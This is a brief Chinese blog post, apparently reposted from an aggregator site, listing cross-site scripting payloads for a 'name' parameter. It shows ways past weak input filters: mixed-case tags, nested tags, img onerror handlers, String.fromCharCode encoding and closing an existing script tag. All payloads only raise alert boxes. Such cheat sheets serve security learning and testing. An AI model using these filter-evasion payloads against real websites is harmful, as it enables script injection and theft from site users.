XSS
Posted luyinhai
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS相关的知识,希望对你有一定的参考价值。
直接攻击name=<script>alert("xss")</script>
大小写绕过name=<scripT>alert("xss")</scripT>
嵌套式绕过name=<scr<script>ipt>alert("xss")</scr</script>ipt>
img标签绕过name=<img src=""onerror="alert(‘xss‘)">
包含alert字符串即报错,使用编码方式绕过name=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>
构造js脚本绕过name=</script><script>alert(‘xss‘)</script>
以上是关于XSS的主要内容,如果未能解决你的问题,请参考以下文章